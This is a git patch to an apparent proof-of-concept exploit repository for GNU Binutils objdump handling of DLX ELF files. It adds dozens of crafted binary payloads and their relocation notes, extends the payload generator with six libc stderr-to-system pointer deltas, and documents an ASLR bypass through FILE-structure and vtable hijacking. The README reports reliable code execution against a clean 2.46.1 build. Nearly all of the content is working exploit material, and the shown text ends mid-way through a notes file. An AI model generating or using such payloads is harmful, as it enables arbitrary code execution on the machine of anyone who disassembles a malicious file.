From e2e34f39b594c99e99a16447b0bda4df782c599e Mon Sep 17 00:00:00 2001 From: ashton <63224111+bikini@users.noreply.github.com> Date: Thu, 25 Jun 2026 06:20:19 -0500 Subject: [PATCH] Expand objdump DLX ASLR delta coverage --- objdump-dlx-calc-poc/README.md | 22 ++++++++---- .../docs/aslr-bypass-analysis.md | 32 +++++++++++++++-- .../generate_objdump_dlx_calc_poc.py | 9 ++++- ...c_aslr_gnu2461_f05_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ .../tools/aslr_delta_coverage.py | 31 ++++++++++++++++ 100 files changed, 1717 insertions(+), 9 deletions(-) create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/tools/aslr_delta_coverage.py diff --git a/objdump-dlx-calc-poc/README.md b/objdump-dlx-calc-poc/README.md index 4ba00cf..ed072d0 100644 --- a/objdump-dlx-calc-poc/README.md +++ b/objdump-dlx-calc-poc/README.md @@ -28,6 +28,7 @@ elf32-dlx - `dlx_chain_builder.py` - small builder used by the generator - `docs/aslr-bypass-analysis.md` - notes on why this is profile-dependent - `tools/search_pointer_transform.py` - Z3 sanity check for fixed pointer transforms +- `tools/aslr_delta_coverage.py` - lists the libc low-32 delta coverage used by the generator The payload files are named `.bin` because they are raw binary files, but the file format inside is ELF/DLX. @@ -43,22 +44,31 @@ relative offsets observed in the target process: ```text layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` -That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. +That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. The six `system_delta` values cover every page-aligned low-32-bit libc base for the documented `_IO_2_1_stderr_` and `system` offsets. A miss can still happen if the heap/libio profile or libc build does not match, so the runner keeps the retry loop. More detail is in `docs/aslr-bypass-analysis.md`. -The `gnu2461` profile was validated with the existing runner: +The expanded `gnu2461` profile was validated with the existing runner against a +clean GNU Binutils 2.46.1 `dlx-elf` objdump build: ```text -HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin -CALC_HELPER_RAN 2026-06-25T11:14:27Z +HIT try=1 payload=payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin +CALC_HELPER_RAN 2026-06-25T11:19:07Z +``` + +A ten-run one-sweep stability pass against the same clean build also hit every +run: + +```text +hits=10/10 +CALC_HELPER_RAN 2026-06-25T11:19:31Z ``` So a plain crash like this does not always mean the PoC failed: diff --git a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md index 15df6a9..2583658 100644 --- a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md +++ b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md @@ -24,7 +24,7 @@ off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` The `gnu2461` profile uses: @@ -35,7 +35,7 @@ off_sec=0xbb8 sec_size_offset=0x40 rbase=0x190 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` The 2.46.1 profile differs because the relocation cache array moved from @@ -43,6 +43,34 @@ The 2.46.1 profile differs because the relocation cache array moved from to `data+0xbb8`, and the `bfd_section.size` field used to widen generic relocation range checks is at section offset `0x40`. +## Fixed delta coverage + +The `FILE+0x68` field starts as a libc pointer to `_IO_2_1_stderr_`. The +payload uses a 32-bit big-endian relocation add to turn that low 32-bit value +into the low 32 bits of `system`. + +The previous payload set included two deltas. For the documented offsets: + +```text +_IO_2_1_stderr_ offset = 0x2044e0 +system offset = 0x58750 +``` + +there are six possible deltas over all page-aligned low-32-bit libc bases: + +```text +0x7042e500 pages=703488 coverage=0.670898 cumulative=0.670898 +0x6f42e600 pages=235520 coverage=0.224609 cumulative=0.895508 +0x7043e4ff pages=82620 coverage=0.078793 cumulative=0.974300 +0x6f43e5ff pages=26520 coverage=0.025291 cumulative=0.999592 +0x7043e5ff pages=324 coverage=0.000309 cumulative=0.999901 +0x6f43e6ff pages=104 coverage=0.000099 cumulative=1.000000 +``` + +`tools/aslr_delta_coverage.py` reproduces that table. This is better coverage +for the libc low-32 portion of the bypass, not a claim that the heap/libio +profile is universal. + ## Why argv two-stage is not enough A deterministic leak-then-exploit route would need this sequence in one diff --git a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py index faf2348..ed2252b 100644 --- a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py +++ b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py @@ -28,7 +28,14 @@ SECTION_SIZE_HIGH = OFF_SEC + 0x3C BUF_TO_FILE_BE32_DELTAS = (0xEF210000, 0xF020FF00) WIDE_TO_FAKE_BE32_DELTAS = (0x4FFF0000,) -STDERR_TO_SYSTEM_BE32_DELTAS = (0x7042E500, 0x7043E4FF) +STDERR_TO_SYSTEM_BE32_DELTAS = ( + 0x7042E500, + 0x6F42E600, + 0x7043E4FF, + 0x6F43E5FF, + 0x7043E5FF, + 0x6F43E6FF, +) FILE_JUMPS_TO_WFILE_OVERFLOW_FINISH_BE16 = 0x0002 LAYOUTS = ( diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..25023215a008bd50ba066e8b92e6c9603f597d1e GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+K$GkGiuZXvWTD{v{OAkQAtQJ5ez7}5Og7mVp>);S1kMF;5BhV_2IA zzoT%`TKE1}iS+>3Szf&gIN2chRt8$gGjl+z;5^`p{sm|w@AwI11%CnUf;BF|-@p^1 z{T%2Nd;vU_zqZg&+usPA=jO^E7vHKYWv_w;TRW!_Rx8mh$Hff4|`$ zH0tbE)A=ur`YWS8QZ7(w+<(mQj~o7C`R$Lif7U4T~5K6DX!0(ug93VIrP26~nyDYLF$UZr$Wfwx=Q`TA*V|7foa@3?f(#P#W6WqSvnt{g}BInLrc{tL*A$x7b2 zynLCdB$C{vke FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..fe5f17101db92139bbeea0cba41a326f16d01e99 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWi_y!6J*Yn+<B90iD`BA$*2Wq0m|)-gwVXeH zK@#;9@4HH@8^BKS=(m8A^1Q1eP)DAa0_p{)fu!h%Km&Qx1CSDY1R4dOI0T=84@A2c zXcp`PTI6?sfmWOR7-$py1ZWri8t4%H21tv33v^Qd-v)f7?o0t))SYSIljw^;cOtmD zp6~`ghsZ5o2`(1!bbhb{-jBE(Q2A%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5c#pzL82qwKNs>Kjy;9B~gZ~ FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 